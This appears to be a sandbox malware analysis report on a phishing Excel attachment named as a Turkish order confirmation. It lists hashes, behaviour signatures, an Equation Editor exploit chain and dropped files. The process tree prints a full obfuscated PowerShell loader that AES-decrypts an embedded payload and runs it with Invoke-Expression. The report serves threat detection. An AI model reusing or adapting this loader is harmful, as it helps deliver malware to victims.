Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    144s
  • max time network
    108s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    09/07/2024, 10:29

General

  • Target

    Sipariş onayı.xls

  • Size

    1.1MB

  • MD5

    94d52f7b132f459b88ba2b9c6ed076cb

  • SHA1

    6970a28538c35aa1c20b32a855e40c85842025d7

  • SHA256

    57b1e7f094836b89c613e86a12966702169ead968058ac24c738b891bb8fa01e

  • SHA512

    c8a18dab02481a7d226d9d3a71b38087e3406e089051995c1be66e49dcb5b715212ab3eb8a36fe7925a32cb79d6baa98ba0ed2cdb8ea5803d5c1e5fe80b8b594

  • SSDEEP

    24576:48q+k+xbyN3g3yBO128OA2BFzfOSr4hBBzcIPuV8rv4zBkS3QHVO:dq+k+yOUJvSSr4N4IzvT+QH

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Abuses OpenXML format to download file from external location 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Sipariş onayı.xls"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1432
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2152
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:288
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rosepetelgoodfordress.vBS"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI30773578260699216772112657705967CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
          3⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2232

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

      Filesize

      1KB

      MD5

      b5cb610c294a6618c6043081054508f0

      SHA1

      5751c85ee092b7c30c93b1f1ea2baf890bd99d4a

      SHA256

      8040a50a5ab1e6859d1ae14b1a9f84cf0fc328a0d9face70ec27ac8e6abe8cef

      SHA512

      314a5c9e63275ab2d41b445f5b4cf1b9d17c06652c63ce44c0d7a25cc912a836bba7018e7d6efdbd7fb8350337f486cb56f463009cb52cf67fda28507bc2bf87

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

      Filesize

      724B

      MD5

      8202a1cd02e7d69597995cabbe881a12

      SHA1

      8858d9d934b7aa9330ee73de6c476acf19929ff6

      SHA256

      58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

      SHA512

      97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

      Filesize

      410B

      MD5

      645287664cbf1bc468e7d792eeb91e44

      SHA1

      a9f051d26930077fdc1593b3e9defb4018ab8314

      SHA256

      5a58ced63147ff319d95e6fb03da5077b737bdc219a6697e15502cc4b908ee87

      SHA512

      6d74329f303391aaf4a3535aec6b58478eb3fa636df2bbc5a5a15f52884d876414cc2ca63c550ffb9159a5118c5acf4795926d7bee5fbef5ef8af33e961a0d72

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      e3301f0853adeb75c893792da959935b

      SHA1

      05587c0bbe8a4e388afcf097c65931b263a2fd44

      SHA256

      2977d3fed2f10eb99576eef6172867663561f9e62516838ab8e3ae0d2d7cb144

      SHA512

      dfc77656593462ed605c51953a9de4db81916025be517ec53c686c26d209e346a2b623ba1c1f0f1dbcf2852aff06979bb30e2bb3c215669a231b067f040a8e9b

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

      Filesize

      392B

      MD5

      6beae66f4c7c60c38ba3cb7650e4f8ed

      SHA1

      af297fae77232f11ebfc2103caa783170fa66750

      SHA256

      1964474829f3b1dcf31249e0adb388f8f06f2468d2f825ab239616e336a6eb0d

      SHA512

      449662dbe1b0ceaabdb7f4036849c2e1411e26e4c969de9d54ee1694038609ef423c853a7a7ec65f8791c40098a5eb58357e1be6d594025585a43d817a2e1a26

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{DA5DC326-69A9-4506-A8A0-5FC5539941CB}.FSD

      Filesize

      128KB

      MD5

      54cff9032647ed7e4a770eaa8ed9dc0e

      SHA1

      ba636fa3895b60ebaf57ed2dc5e0ee803115cfd0

      SHA256

      c799b5487e951f3836547eaed081cface25c284fe01e7572d4332670b36415f3

      SHA512

      0a94005aeeb8937f34d617c3ea4e358e6f4c0f9a60e493098877ea7cfe4071c403373ebe38c68d892a67853b829b50e3f2df21d7c3b3dab2fb0e6c27cf8d44a9

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      5b444cbdbc52eb352f3996d84239e829

      SHA1

      23a41f708656128d84d8215bf9f2a8b4835f6da3

      SHA256

      1a10e1bdf84928d541d19dfadaf1d7a3132a96f5ec187cef8e3994f2d06d6800

      SHA512

      1bdaab0c25075427c151cfa56815ee7167ec0e8111eac4a7d9d5a677ad80d4578fd187730f69da5580df2dc597129c1c3de887d98c0f8fb0e36ed53a30dc5d86

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0E0C29EE-CC79-40E3-90D8-8449C14BFAA7}.FSD

      Filesize

      128KB

      MD5

      dac4f1cd0ecfe0f288818907d4e2f319

      SHA1

      86d37ff9226d6c173fc64b7f9148b876f42d8309

      SHA256

      e948cd52bb462831e90bb0e7a0665e4bbc7b2498a7de071c51e746f8a67dd9a8

      SHA512

      5f8bb95e6e8c006ea45f6f2f53b2186ef1f075e8951a9f38e92cec6a161fbe55de0de27d589d89873234a38bc0ec684a6a61e6104a56bf3275bb45f49dd18c55

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GLOK2QLQ\paste1[1].txt

      Filesize

      156B

      MD5

      ad6c37ef980373e9bcbd14810fad34bc

      SHA1

      9c061a1b3608b7c7f1db7cd06c8246913ee11bda

      SHA256

      ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

      SHA512

      30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J8I3CVQY\we.we.we.we.wee[1].doc

      Filesize

      221KB

      MD5

      dec81947f9c288a6337b7eb4b8dec580

      SHA1

      587afe240a9013b8a6fd0d2a574f2ce814fd40b3

      SHA256

      008c8d4399750dba2733ce354ec97453535e8f00d293368a46c6e5514ebde20f

      SHA512

      ca82e253009b29a6f2ad7143818c0a4209c56d3bb1aa01f70532a6a1c111399c3acf5b791cb4913fe94430013a0b7b377fb7f4ed65a60d14e60f7fa216006bbc

    • C:\Users\Admin\AppData\Local\Temp\CabF519.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar1A7.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Local\Temp\{11355A20-CB24-428C-9835-1B787A3A601C}

      Filesize

      128KB

      MD5

      fc7a9031da9cf43d5bfca3d9e1fe8004

      SHA1

      ae1b787bff629f2d41bacf916da123ec7ad1cfea

      SHA256

      3675add65bd995635aadc302dbafdf1894a981eda03c0b5ade57331c84d2930e

      SHA512

      6df6b6742dc1eeda62e2dfcda71ab0de265790abf92ac48c39156999233e36d634fe4e51ec28690c6b19ed1c5f6608e416d97fc4863e3b4c18edfd405b5e81d8

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Filesize

      281B

      MD5

      662f5093d14856818bc3e742feb4235d

      SHA1

      58d23d8ef269f770e03dafd08ba58d805f3f4c2d

      SHA256

      92a056bff710e3ee5a7a836d42f470c5c289375cf8a577de83d7854d41c36fc2

      SHA512

      358a1fd49519846f042d7715604410efa571813795fc73464fc88ea2bc81a18bc91d50890752f7fc11376cd0794f8a7e997288a50bd96ea0a5440c968178056b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\KWPW6DW2.txt

      Filesize

      819B

      MD5

      9198d5f29a3e66eab0e4a70204f5b863

      SHA1

      6427b29a7e71153091fd4826b2e471903556fa6a

      SHA256

      eee57b4b4543d5b6c0bdc0c8c2487f9db03664dde3c64743553ea09a0dc4c61d

      SHA512

      074b619b8f981a5309adbb3de8cd460d80a49931469e491158de37985a2f9d0f70231e7614ae2bbd0d58c03e86d7a76864c31d29dba14a1a93446d49e390343e

    • C:\Users\Admin\AppData\Roaming\rosepetelgoodfordress.vBS

      Filesize

      149KB

      MD5

      20765ae510b61f59e546c0b712a00009

      SHA1

      feccf03d61bbb21c258f772014d75a5bec2b11ad

      SHA256

      52caa19680e0ec9056836273759dc72e982c8ea03bd48a8c888a6b7acf193a35

      SHA512

      805753a168b4c1942b8b10b3d06a82df0c308f65c9a5c04504bee9bd1da2d80bef87e2a6ead758ab90873918c944208b6af96583e6dffc1c5c591d57a4fa2cb0

    • memory/1432-1-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB

    • memory/1432-26-0x0000000002450000-0x0000000002452000-memory.dmp

      Filesize

      8KB

    • memory/1432-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1432-142-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB

    • memory/2780-25-0x0000000003FB0000-0x0000000003FB2000-memory.dmp

      Filesize

      8KB

    • memory/2780-23-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB

    • memory/2780-21-0x000000002F391000-0x000000002F392000-memory.dmp

      Filesize

      4KB

    • memory/2780-143-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB

    • memory/2780-157-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2780-158-0x0000000072B8D000-0x0000000072B98000-memory.dmp

      Filesize

      44KB